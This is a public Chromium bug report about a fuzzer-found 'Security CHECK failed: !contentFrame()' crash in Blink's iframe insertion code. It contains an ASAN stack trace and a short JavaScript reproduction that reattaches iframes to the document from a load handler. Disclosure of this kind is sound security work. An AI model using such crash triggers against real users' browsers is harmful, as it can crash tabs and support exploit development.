Security: Security CHECK failed: !contentFrame()
Reported by cloudfuz...@gmail.com, Jan 8 2017
Issue description
VULNERABILITY DETAILS
The latest ASAN build of chromium crashes as follows when loading the testcase:
[4678:4678:0108/133101.549313:FATAL:HTMLFrameElementBase.cpp(194)] Security CHECK failed: !contentFrame().
#0 0x56213fed4bb1 __interceptor_backtrace
#1 0x562146efd020 base::debug::StackTrace::StackTrace()
#2 0x562146f5b82c logging::LogMessage::~LogMessage()
#3 0x562151942398 blink::HTMLFrameElementBase::didNotifySubtreeInsertionsToDocument()
#4 0x562150c3950d blink::ContainerNode::insertNodeVector<>()
#5 0x562150c349e0 blink::ContainerNode::appendChild()
#6 0x562150eba875 blink::Node::appendChild()
#7 0x56214fd0a67b blink::NodeV8Internal::appendChildMethodCallbackForMainWorld()
#8 0x562140eb7fac v8::internal::FunctionCallbackArguments::Call()
#9 0x56214112cb9d v8::internal::(anonymous namespace)::HandleApiCallHelper<>()
#10 0x562141129753 v8::internal::Builtin_Impl_HandleApiCall()
#11 0x7fecb5a04427 <unknown>
Received signal 6
#0 0x56213fed4bb1 __interceptor_backtrace
#1 0x562146efbf3b base::debug::(anonymous namespace)::StackDumpSignalHandler()
#2 0x7fee2de803e0 <unknown>
#3 0x7fee2abe2428 gsignal
#4 0x7fee2abe402a abort
#5 0x562146ef888a base::debug::BreakDebugger()
#6 0x562146f5c104 logging::LogMessage::~LogMessage()
#7 0x562151942398 blink::HTMLFrameElementBase::didNotifySubtreeInsertionsToDocument()
#8 0x562150c3950d blink::ContainerNode::insertNodeVector<>()
#9 0x562150c349e0 blink::ContainerNode::appendChild()
#10 0x562150eba875 blink::Node::appendChild()
#11 0x56214fd0a67b blink::NodeV8Internal::appendChildMethodCallbackForMainWorld()
#12 0x562140eb7fac v8::internal::FunctionCallbackArguments::Call()
#13 0x56214112cb9d v8::internal::(anonymous namespace)::HandleApiCallHelper<>()
#14 0x562141129753 v8::internal::Builtin_Impl_HandleApiCall()
#15 0x7fecb5a04427 <unknown>
r8: 000000008fff6fff r9: 0000000000000000 r10: 0000000000000008 r11: 0000000000000202
r12: 00007fecdbaedae0 r13: 0000000000000000 r14: 00007fecdbaed800 r15: 00007fecdb825820
di: 0000000000001246 si: 0000000000001246 bp: 00007ffd8967d110 bx: 00007ffd8967d120
dx: 0000000000000006 ax: 0000000000000000 cx: 00007fee2abe2428 sp: 00007ffd8967cfd8
ip: 00007fee2abe2428 efl: 0000000000000202 cgf: 0000000000000033 erf: 0000000000000000
trp: 0000000000000000 msk: 0000000000000000 cr2: 0000000000000000
[end of stack trace]
VERSION
Chrome Version: asan-linux-release-434865
REPRODUCTION CASE
<script>
function start() {
  o0 = window.document;
  // Two iframes created in the top document; o57 gets a load handler.
  o51 = o0.createElementNS('http://www.w3.org/1999/xhtml', 'iframe');
  o57 = o0.createElementNS('http://www.w3.org/1999/xhtml', 'iframe');
  o57.addEventListener('load', f1, false);
  // Empty the top document (stops when removeChild throws on an empty document).
  try { while (window.top.document.removeChild(window.top.document.firstChild)); } catch (e) {}
  // Build a detached HTML document holding both iframes, then move its
  // root element into the emptied top document in one insertion.
  o76 = window.top.document.implementation.createHTMLDocument();
  o76.body.appendChild(o57);
  o76.body.appendChild(o51);
  window.top.document.appendChild(o76.documentElement);
}
function f1() {
  // Load handler for o57: re-appends o51 to the top document while the
  // subtree insertion above is still being notified.
  window.top.document.documentElement.appendChild(o51);
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Jan 9 2017
Clusterfuzz says this is flaky. But it looks like this is a relatively new CHECK: https://chromium.googlesource.com/chromium/src/+/baf4f1f0cca9c704ff01de23e9360a1deef00cb4
Jan 10 2017
Apr 18 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by ClusterFuzz, Jan 9 2017